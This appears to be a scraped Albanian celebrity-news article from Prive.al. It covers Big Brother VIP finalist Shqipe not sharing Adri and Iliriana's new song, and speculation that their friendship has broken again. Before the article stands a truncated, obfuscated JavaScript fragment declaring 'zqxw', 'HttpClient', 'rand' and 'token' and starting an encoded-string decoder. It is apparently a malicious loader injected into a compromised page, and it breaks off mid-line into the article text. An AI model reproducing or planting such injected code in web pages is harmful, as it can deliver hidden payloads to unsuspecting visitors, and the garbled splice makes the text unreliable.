;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘Tradhtia 2.0’? Lëkundet raporti i treshes Adri-Iliriana-Shqipe

By

Ditën e djeshme erdhi e plotë kënga ‘Ti kur dojshe’ nga Adri dhe Iliriana.

Projekti u bë hit ende pa dalë vetëm me një sekuencë të shkurtër në TikTok.

Por, as kur u bë viral pa u publikuar e as mbi 24 orë pas publikimit, kënga nuk e ka marrë vëmendjen e një personi goxha të rëndësishëm për dyshen brenda shtëpisë së Big Brother VIP, Shqipes.

Finalistja nuk e ka parë të arsyeshme që ta shpërndajë këngën, ndryshe nga projekti i Ardit publikuar para disa javësh të cilin e shpërndau si story.

Kjo ka ngjallur dyshime se raporti mes çiftit dhe Shqipes nuk është sërish më i miri i mundshëm.

Ata patën krisje në aleancën e tyre në shtëpi, me veprime që nga Adri u konsideruan ‘tradhti’. Më pas, me të mbaruar loja, ata gjetën gjuhën e përbashkët duke u shfaqur disa herë bashkë.

Por, me shumë gjasë, shoqëria e treshes ka marrë fund, këtë herë pakthyeshëm.

Një ‘tradhti 2.0’ në horizont? Do na duhet të presim dhe pak për të kuptuar më shumë. /Prive.al

Artikuj të ngjashëm